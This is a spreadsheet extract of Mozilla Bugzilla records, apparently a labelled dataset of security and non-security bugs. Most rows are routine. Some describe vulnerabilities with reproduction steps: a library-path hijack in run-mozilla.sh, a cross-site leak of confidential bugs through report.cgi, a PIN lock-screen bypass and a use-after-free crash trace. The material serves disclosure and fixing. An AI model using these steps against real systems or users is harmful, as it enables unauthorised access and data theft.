/home/grib/bin/firefox/firefox-bin: librt.so.1: no version information available (required by /home/grib/bin/firefox/libxul.so)
/home/grib/bin/firefox/firefox-bin: librt.so.1: no version information available (required by /usr/lib/libgthread-2.0.so.0)
/home/grib/bin/firefox/firefox-bin: librt.so.1: no version information available (required by /usr/lib/libasound.so.2)
/home/grib/bin/firefox/firefox-bin: librt.so.1: no version information available (required by /lib/libdbus-1.so.3)
my_init()
/home/grib/bin/firefox/firefox-bin: relocation error: /home/grib/bin/firefox/libxul.so: symbol clock_gettime, version GLIBC_2.2.5 not defined in file librt.so.1 with link time reference
Here's a run with -d option so that run-mozilla.sh dumps its variables:
$ ~/bin/firefox/firefox -g -no-remote -ProfileManager
/home/grib/bin/firefox/run-mozilla.sh -g /home/grib/bin/firefox/firefox-bin -no-remote -ProfileManager
MOZILLA_FIVE_HOME=/home/grib/bin/firefox
  LD_LIBRARY_PATH=/home/grib/bin/firefox:/home/grib/bin/firefox/plugins:/home/grib/bin/firefox:
DISPLAY=:0.0
DYLD_LIBRARY_PATH=/home/grib/bin/firefox:/home/grib/bin/firefox
     LIBRARY_PATH=/home/grib/bin/firefox:/home/grib/bin/firefox/components:/home/grib/bin/firefox
       SHLIB_PATH=/home/grib/bin/firefox:/home/grib/bin/firefox
          LIBPATH=/home/grib/bin/firefox:/home/grib/bin/firefox
       ADDON_PATH=/home/grib/bin/firefox
      MOZ_PROGRAM=/home/grib/bin/firefox/firefox-bin
      MOZ_TOOLKIT=
        moz_debug=1
     moz_debugger=
moz_debugger_args=
/usr/bin/ddd  --gdb -- --args /home/grib/bin/firefox/firefox-bin -no-remote -ProfileManager
The vulnerability is that someone may trick the user to download a malicious library, the user might save it into his $HOME and after that start firefox from $HOME.
The fix is simple: replace ${var+":$var"} by ${var:+":$var"} expressions in run-mozilla.sh.  The difference is that the first expression expands to nothing only if var is unset, but the second expands to nothing if var is unset or var is empty.
Reproducible: Always</t>
        </is>
      </c>
      <c r="X3629" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3630">
      <c r="A3630" t="n">
        <v>1481871</v>
      </c>
      <c r="B3630" t="inlineStr">
        <is>
          <t>2018-08-08 09:45:07 -0700</t>
        </is>
      </c>
      <c r="C3630" t="inlineStr">
        <is>
          <t>socorro deploy: 328</t>
        </is>
      </c>
      <c r="D3630" t="inlineStr">
        <is>
          <t>2018-08-08 10:31:26 -0700</t>
        </is>
      </c>
      <c r="E3630" t="n">
        <v>1</v>
      </c>
      <c r="F3630" t="n">
        <v>1</v>
      </c>
      <c r="G3630" t="n">
        <v>4</v>
      </c>
      <c r="H3630" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3630" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J3630" t="inlineStr">
        <is>
          <t>Infra</t>
        </is>
      </c>
      <c r="K3630" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3630" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3630" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3630" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3630" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3630" t="inlineStr"/>
      <c r="Q3630" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3630" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3630" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3630" t="n">
        <v>1</v>
      </c>
      <c r="U3630" t="n">
        <v>0</v>
      </c>
      <c r="V3630" t="n">
        <v>3</v>
      </c>
      <c r="W3630" t="inlineStr">
        <is>
          <t>We want to do a Socorro -prod deploy today tagged 328.
It consists of the following:
(current tag: 327 - 4fd291e)
ccc8623: fix bug 1478055: Add product documentation (willkg)
d0c7e0a: Fix some wording and clarity issues (willkg)
8da3573: Ignore .pytest_cache/ and clean up .gitignore (willkg)
42e7c40: fix bug 1481282: handle c/cpp and rust frames separately (willkg)
de42b9e: fix bug 1481828: fix proto_signature in SignatureGeneratorRule (willkg)
(next tag: 328 - 3291331)
This fixes a regression with proto_signature, so the sooner it goes out the better.
Further, we need to reprocess crashes for the last couple of days for Firefox and FennecAndroid.</t>
        </is>
      </c>
      <c r="X3630" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3631">
      <c r="A3631" t="n">
        <v>1404451</v>
      </c>
      <c r="B3631" t="inlineStr">
        <is>
          <t>2017-09-29 11:27:56 -0700</t>
        </is>
      </c>
      <c r="C3631" t="inlineStr">
        <is>
          <t>Update color of glass borders around the UI</t>
        </is>
      </c>
      <c r="D3631" t="inlineStr">
        <is>
          <t>2017-10-12 15:01:39 -0700</t>
        </is>
      </c>
      <c r="E3631" t="n">
        <v>1</v>
      </c>
      <c r="F3631" t="n">
        <v>1</v>
      </c>
      <c r="G3631" t="n">
        <v>2</v>
      </c>
      <c r="H3631" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3631" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3631" t="inlineStr">
        <is>
          <t>Theme</t>
        </is>
      </c>
      <c r="K3631" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3631" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3631" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N3631" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3631" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3631" t="inlineStr">
        <is>
          <t>[reserve-photon-visual]</t>
        </is>
      </c>
      <c r="Q3631" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3631" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3631" t="inlineStr">
        <is>
          <t>Firefox 58</t>
        </is>
      </c>
      <c r="T3631" t="n">
        <v>1</v>
      </c>
      <c r="U3631" t="n">
        <v>0</v>
      </c>
      <c r="V3631" t="n">
        <v>9</v>
      </c>
      <c r="W3631" t="inlineStr">
        <is>
          <t>from bug 1404286 comment 5:
&gt; &gt; &gt; +%define glassShadowColor hsla(209,67%,12%,0.35)
&gt; &gt; 
&gt; &gt; Shouldn't this be hsla(240, 5%, 5%, 0.3) (--color-chrome-border-30 from
&gt; &gt; http://design.firefox.com/people/shorlander/photon/Mockups/windows-7.html)?
&gt; 
&gt; Not sure. We've been using this value since forever and it seems to work
&gt; well. I suspect Stephen just came up randomly with something different for
&gt; his mockup, not necessarily because it's better than this color. I'll file a
&gt; new bug on potentially changing it.</t>
        </is>
      </c>
      <c r="X3631" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3632">
      <c r="A3632" t="n">
        <v>918004</v>
      </c>
      <c r="B3632" t="inlineStr">
        <is>
          <t>2013-09-18 12:22:31 -0700</t>
        </is>
      </c>
      <c r="C3632" t="inlineStr">
        <is>
          <t>B2G: Can't see remote stylesheets in Style Editor</t>
        </is>
      </c>
      <c r="D3632" t="inlineStr">
        <is>
          <t>2020-01-21 14:21:09 -0800</t>
        </is>
      </c>
      <c r="E3632" t="n">
        <v>1</v>
      </c>
      <c r="F3632" t="n">
        <v>1</v>
      </c>
      <c r="G3632" t="n">
        <v>6</v>
      </c>
      <c r="H3632" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3632" t="inlineStr">
        <is>
          <t>DevTools Graveyard</t>
        </is>
      </c>
      <c r="J3632" t="inlineStr">
        <is>
          <t>WebIDE</t>
        </is>
      </c>
      <c r="K3632" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3632" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3632" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3632" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3632" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3632" t="inlineStr"/>
      <c r="Q3632" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3632" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3632" t="inlineStr">
        <is>
          <t>Firefox 27</t>
        </is>
      </c>
      <c r="T3632" t="n">
        <v>1</v>
      </c>
      <c r="U3632" t="n">
        <v>0</v>
      </c>
      <c r="V3632" t="n">
        <v>13</v>
      </c>
      <c r="W3632" t="inlineStr">
        <is>
          <t>While debugging bug 917306, I noticed that currently the Style Editor can't display remote stylesheets inside B2G apps.
When the actor attempts to run _loadSourceFromCache for a remote (http[s]) stylesheet, asyncOpen on the channel fails.  
My current suspicion for why this happens is that for B2G apps, the actor code is loaded into the same context as the app itself, and so the B2G security model is blocking the actor from making this request, just as it would for some types of apps.
I have seen this issue in at least two apps so far:
* Marketplace app (app://marketplace.firefox.com/index.html)
 * 1 app:// sheet (this usually loads, but see bug 917306)
 * &lt;iframe src="https://marketplace.firefox.com/?mcc=&amp;mnc="&gt;&lt;/iframe&gt;
   * 2 https:// sheets inside (these fail to load)
* Twitter app (sign in page) (https://mobile.twitter.com/)
 * 1 inline sheet (loads fine)
 * 1 https:// sheet directly on page (this fails to load)</t>
        </is>
      </c>
      <c r="X3632" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3633">
      <c r="A3633" t="n">
        <v>1433400</v>
      </c>
      <c r="B3633" t="inlineStr">
        <is>
          <t>2018-01-26 02:31:20 -0800</t>
        </is>
      </c>
      <c r="C3633" t="inlineStr">
        <is>
          <t>Prevent cross-site image requests from leaking contents of certain fields due to regex search</t>
        </is>
      </c>
      <c r="D3633" t="inlineStr">
        <is>
          <t>2024-05-30 09:42:21 -0700</t>
        </is>
      </c>
      <c r="E3633" t="n">
        <v>1</v>
      </c>
      <c r="F3633" t="n">
        <v>1</v>
      </c>
      <c r="G3633" t="n">
        <v>4</v>
      </c>
      <c r="H3633" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3633" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3633" t="inlineStr">
        <is>
          <t>Reporting/Charting</t>
        </is>
      </c>
      <c r="K3633" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3633" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3633" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3633" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3633" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3633" t="inlineStr">
        <is>
          <t>[reporter-external] [web-bounty-form] [verif?]</t>
        </is>
      </c>
      <c r="Q3633" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3633" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3633" t="inlineStr">
        <is>
          <t>Bugzilla 4.4</t>
        </is>
      </c>
      <c r="T3633" t="n">
        <v>1</v>
      </c>
      <c r="U3633" t="n">
        <v>0</v>
      </c>
      <c r="V3633" t="n">
        <v>52</v>
      </c>
      <c r="W3633" t="inlineStr">
        <is>
          <t>Via the image generation in report.cgi it is possible for a third-party website to extract confidential bug information if a logged-in user with access to a confidential bug visits the website. For example, a third-party website can access the summary of a security-sensitive bug report.
The problem exists because via report.cgi complex queries to the bugzilla database can be done and if there is a result, an image will be returned, but if the query has no result no image is returned. Because of this a third-party website can extract information by detecting if certain images can be loaded or not.
POC:
1.) download attached poc.html
2.) login to bugzilla
3.) open poc.html and enter a bug id of a confidential bug and the url of the bugzilla installation (I have tested the poc with URL: https://bugzilla.mozilla.org and Bug ID: 1395143)
4.) click on “Get Summary”
After a while, most of the summary is displayed at the html file.</t>
        </is>
      </c>
      <c r="X3633" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3634">
      <c r="A3634" t="n">
        <v>1483385</v>
      </c>
      <c r="B3634" t="inlineStr">
        <is>
          <t>2018-08-14 14:36:52 -0700</t>
        </is>
      </c>
      <c r="C3634" t="inlineStr">
        <is>
          <t>"arc upgrade" fails on Windows</t>
        </is>
      </c>
      <c r="D3634" t="inlineStr">
        <is>
          <t>2018-09-20 17:15:58 -0700</t>
        </is>
      </c>
      <c r="E3634" t="n">
        <v>1</v>
      </c>
      <c r="F3634" t="n">
        <v>1</v>
      </c>
      <c r="G3634" t="n">
        <v>7</v>
      </c>
      <c r="H3634" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3634" t="inlineStr">
        <is>
          <t>Conduit</t>
        </is>
      </c>
      <c r="J3634" t="inlineStr">
        <is>
          <t>Phabricator</t>
        </is>
      </c>
      <c r="K3634" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L3634" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3634" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3634" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3634" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3634" t="inlineStr"/>
      <c r="Q3634" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3634" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3634" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3634" t="n">
        <v>1</v>
      </c>
      <c r="U3634" t="n">
        <v>0</v>
      </c>
      <c r="V3634" t="n">
        <v>3</v>
      </c>
      <c r="W3634" t="inlineStr">
        <is>
          <t>Running "arc upgrade" fails on both of my Windows 10 machines, including the one I just set up today.  Running "git pull" directly on the arcanist clone works fine, though.
$ arc upgrade --trace
 ARGV  "C:/Users/mrcot/phabricator/arcanist/bin/../scripts/arcanist.php" "upgrade" "--trace"
 LOAD  Loaded "phutil" from "C:\Users\mrcot\phabricator\libphutil\src".
 LOAD  Loaded "arcanist" from "C:\Users\mrcot\phabricator\arcanist\src".
Config: Reading user configuration file "C:\Users\mrcot\AppData\Roaming/.arcrc"...
Config: Did not find system configuration at "C:\ProgramData\Phabricator/Arcanist/config".
Working Copy: No candidate locations for .arcconfig from this working directory.
Working Copy: Path "C:\Users\mrcot" is not in any working copy.
Upgrading libphutil...
Working Copy: Reading .arcconfig from "C:\Users\mrcot\phabricator\libphutil/.arcconfig".
Working Copy: Path "C:\Users\mrcot\phabricator\libphutil" is part of `git` working copy "C:\Users\mrcot\phabricator\libphutil".
Working Copy: Project root is at "C:\Users\mrcot\phabricator\libphutil".
Config: Did not find local configuration at "C:\Users\mrcot\phabricator\libphutil\.git\arc/config".
&gt;&gt;&gt; [0] (+0) &lt;exec&gt; $ git rev-parse --git-dir
&lt;&lt;&lt; [0] (+68) &lt;exec&gt; 68,441 us
&gt;&gt;&gt; [1] (+68) &lt;exec&gt; $ git --version
&lt;&lt;&lt; [1] (+120) &lt;exec&gt; 52,282 us
&gt;&gt;&gt; [2] (+121) &lt;exec&gt; $ git status --porcelain=2 -z
&lt;&lt;&lt; [2] (+218) &lt;exec&gt; 97,228 us
&gt;&gt;&gt; [3] (+218) &lt;exec&gt; $ git symbolic-ref --quiet HEAD
&lt;&lt;&lt; [3] (+295) &lt;exec&gt; 76,879 us
&gt;&gt;&gt; [4] (+295) &lt;exec&gt; $ git pull --rebase
&lt;&lt;&lt; [4] (+3,728) &lt;exec&gt; 3,433,366 us
Upgrading arcanist...
Working Copy: No candidate locations for .arcconfig from this working directory.
Working Copy: Path "C:\Users\mrcot\phabricator\arcanist" is not in any working copy.
[2018-08-14 19:18:58] EXCEPTION: (Exception) The current working directory is not part of a working copy for a supported version control system (Git, Subversion or Mercurial). at [&lt;arcanist&gt;\src\repository\api\ArcanistRepositoryAPI.php:85]
arcanist(head=master, ref.master=d9a4293ae734), phutil(head=master, ref.master=dd136d1c3712)
  #0 ArcanistRepositoryAPI::newAPIFromConfigurationManager(ArcanistConfigurationManager) called at [&lt;arcanist&gt;\src\workflow\ArcanistUpgradeWorkflow.php:42]
  #1 ArcanistUpgradeWorkflow::run() called at [&lt;arcanist&gt;\scripts\arcanist.php:394]</t>
        </is>
      </c>
      <c r="X3634" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3635">
      <c r="A3635" t="n">
        <v>750644</v>
      </c>
      <c r="B3635" t="inlineStr">
        <is>
          <t>2012-05-01 02:30:41 -0700</t>
        </is>
      </c>
      <c r="C3635" t="inlineStr">
        <is>
          <t>Serve requests to aus2.mozillamessaging.com using same infra as aus3.mozilla.org</t>
        </is>
      </c>
      <c r="D3635" t="inlineStr">
        <is>
          <t>2018-05-08 15:19:48 -0700</t>
        </is>
      </c>
      <c r="E3635" t="n">
        <v>1</v>
      </c>
      <c r="F3635" t="n">
        <v>1</v>
      </c>
      <c r="G3635" t="n">
        <v>5</v>
      </c>
      <c r="H3635" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3635" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3635" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3635" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3635" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3635" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3635" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3635" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3635" t="inlineStr"/>
      <c r="Q3635" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3635" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3635" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3635" t="n">
        <v>1</v>
      </c>
      <c r="U3635" t="n">
        <v>0</v>
      </c>
      <c r="V3635" t="n">
        <v>11</v>
      </c>
      <c r="W3635" t="inlineStr">
        <is>
          <t>We need
* SSL termination/load balancer
* copy over release snippets
* consistency checks between old/new systems
* QA signoff
* swap aus2.mozillamessaging.com DNS record to point to new load balancer
All before the equipment in sjc1 expires.</t>
        </is>
      </c>
      <c r="X3635" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3636">
      <c r="A3636" t="n">
        <v>806048</v>
      </c>
      <c r="B3636" t="inlineStr">
        <is>
          <t>2012-10-26 22:48:13 -0700</t>
        </is>
      </c>
      <c r="C3636" t="inlineStr">
        <is>
          <t>[lockscreen] Easily unlock a PIN-locked phone without a PIN</t>
        </is>
      </c>
      <c r="D3636" t="inlineStr">
        <is>
          <t>2013-11-07 13:45:55 -0800</t>
        </is>
      </c>
      <c r="E3636" t="n">
        <v>1</v>
      </c>
      <c r="F3636" t="n">
        <v>1</v>
      </c>
      <c r="G3636" t="n">
        <v>6</v>
      </c>
      <c r="H3636" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3636" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J3636" t="inlineStr">
        <is>
          <t>Gaia</t>
        </is>
      </c>
      <c r="K3636" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3636" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M3636" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N3636" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3636" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3636" t="inlineStr">
        <is>
          <t>[label:system/lockscreen]</t>
        </is>
      </c>
      <c r="Q3636" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3636" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3636" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3636" t="n">
        <v>1</v>
      </c>
      <c r="U3636" t="n">
        <v>0</v>
      </c>
      <c r="V3636" t="n">
        <v>10</v>
      </c>
      <c r="W3636" t="inlineStr">
        <is>
          <t>1. Set a PIN on your phone.
2. Set the duration to lock your phone to be "After 1 minute" instead of immediately. This is important.
3. Restart your phone.
4. When the unlock screen comes up, swipe right to see the PIN entering screen. Tap "Cancel".
5. Press the physical power button on your phone, twice in a row.
5. When the unlock screen comes up again, swipe right to unlock the phone..
PIN has been bypassed.
I confirmed this with Matt's B2G dogfood device with the same Git commit info as below.
===
My Git commit info currently shows:
2012-10-24 11:07:05
fcfa1857bed6596e992263206451c6814e4b2... (I see ellipsis at the end)</t>
        </is>
      </c>
      <c r="X3636" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3637">
      <c r="A3637" t="n">
        <v>1130541</v>
      </c>
      <c r="B3637" t="inlineStr">
        <is>
          <t>2015-02-06 11:32:29 -0800</t>
        </is>
      </c>
      <c r="C3637" t="inlineStr">
        <is>
          <t>Heap use-after-free in mozilla::dom::IndexedDB::IDBObjectStore::CreateIndex</t>
        </is>
      </c>
      <c r="D3637" t="inlineStr">
        <is>
          <t>2024-05-30 08:39:51 -0700</t>
        </is>
      </c>
      <c r="E3637" t="n">
        <v>1</v>
      </c>
      <c r="F3637" t="n">
        <v>1</v>
      </c>
      <c r="G3637" t="n">
        <v>3</v>
      </c>
      <c r="H3637" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3637" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3637" t="inlineStr">
        <is>
          <t>Storage: IndexedDB</t>
        </is>
      </c>
      <c r="K3637" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3637" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3637" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N3637" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3637" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3637" t="inlineStr">
        <is>
          <t>[adv-main36+][adv-esr31.5+]</t>
        </is>
      </c>
      <c r="Q3637" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3637" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3637" t="inlineStr">
        <is>
          <t>mozilla38</t>
        </is>
      </c>
      <c r="T3637" t="n">
        <v>1</v>
      </c>
      <c r="U3637" t="n">
        <v>0</v>
      </c>
      <c r="V3637" t="n">
        <v>17</v>
      </c>
      <c r="W3637" t="inlineStr">
        <is>
          <t>Created attachment 8560617
test5.html
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Steps to reproduce:
Open the attached html file in Firefox. It crashes with latest asan and also crashes on latest regular Nightly for me on Windows and Linux.
This is the stacktrace I get with latest build from https://ftp.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-central-linux64-asan/
==2401==ERROR: AddressSanitizer: heap-use-after-free on address 0x606000274108 at pc 0x7fcdabfee8db bp 0x7fffac242540 sp 0x7fffac242538
READ of size 8 at 0x606000274108 thread T0 (Web Content)
    #0 0x7fcdabfee8da in Assign /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/ipc/ipdl/./PBackgroundIDBSharedTypes.cpp:519
    #1 0x7fcdaff05f7e in operator new /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/ipc/ipdl/_ipdlheaders/mozilla/dom/indexedDB/PBackgroundIDBSharedTypes.h:807
    #2 0x7fcdaff26d58 in NoteDeletion /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/indexedDB/IDBObjectStore.cpp:2074
    #3 0x7fcdaff21893 in CreateIndexInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/indexedDB/IDBObjectStore.cpp:1760
    #4 0x7fcdaff20fad in CreateIndex /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/indexedDB/IDBObjectStore.cpp:1682
    #5 0x7fcdae49e431 in createIndex /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/bindings/./IDBObjectStoreBinding.cpp:667
    #6 0x7fcdaf0c1643 in GenericBindingMethod /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/bindings/BindingUtils.cpp:2522
    #7 0x7fcdb3f5d270 in CallJSNative /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jscntxtinlines.h:226
    #8 0x7fcdb3f9a00e in Interpret /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:2558
    #9 0x7fcdb3f7dc89 in RunScript /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:448
    #10 0x7fcdb3f5d82a in Invoke /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:517
    #11 0x7fcdb3fa820e in Invoke /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:554
    #12 0x7fcdb3bbc99f in Call /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jsapi.cpp:4474
    #13 0x7fcdae02ee05 in Call /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/bindings/./EventHandlerBinding.cpp:259
    #14 0x7fcdaf3ca0d1 in Call&lt;nsISupports *&gt; /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/events/../../dist/include/mozilla/dom/EventHandlerBinding.h:350
    #15 0x7fcdaf3c83c2 in HandleEvent /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/events/JSEventHandler.cpp:214
    #16 0x7fcdaf38beaf in HandleEventSubType /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/events/EventListenerManager.cpp:976
    #17 0x7fcdaf38dedf in HandleEventInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/events/EventListenerManager.cpp:1124
    #18 0x7fcdaf37d781 in HandleEventTargetChain /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/events/EventDispatcher.cpp:299
    #19 0x7fcdaf381a06 in Dispatch /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/events/EventDispatcher.cpp:633
    #20 0x7fcdaf342655 in DispatchDOMEvent /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/events/EventDispatcher.cpp:697
    #21 0x7fcdaf35d7d9 in DispatchEvent /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/events/DOMEventTargetHelper.cpp:251
    #22 0x7fcdafeced58 in DispatchSuccessEvent /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/indexedDB/ActorsChild.cpp:751
    #23 0x7fcdafed1f39 in RecvPBackgroundIDBVersionChangeTransactionConstructor /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/indexedDB/ActorsChild.cpp:1406
    #24 0x7fcdabfbe66d in OnMessageReceived /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/ipc/ipdl/./PBackgroundIDBDatabaseChild.cpp:560
    #25 0x7fcdabf9839c in OnMessageReceived /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/ipc/ipdl/./PBackgroundChild.cpp:761
    #26 0x7fcdabf2a941 in DispatchAsyncMessage /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessageChannel.cpp:1231
    #27 0x7fcdabf201b5 in OnMaybeDequeueOne /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessageChannel.cpp:1142
    #28 0x7fcdabede3e4 in RunTask /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:361
    #29 0x7fcdabedf497 in DoWork /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:447
    #30 0x7fcdabf325c2 in Run /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessagePump.cpp:233
    #31 0x7fcdab69d364 in ProcessNextEvent /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:855
    #32 0x7fcdab6fd51a in NS_ProcessNextEvent /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:265
    #33 0x7fcdabf31d29 in Run /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessagePump.cpp:99
    #34 0x7fcdabedcf6c in RunInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:233
    #35 0x7fcdb04f6367 in Run /builds/slave/m-cen-l64-asan-000000000000000/build/src/widget/nsBaseAppShell.cpp:164
    #36 0x7fcdb206a732 in XRE_RunAppShell /builds/slave/m-cen-l64-asan-000000000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:738
    #37 0x7fcdabedcf6c in RunInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:233
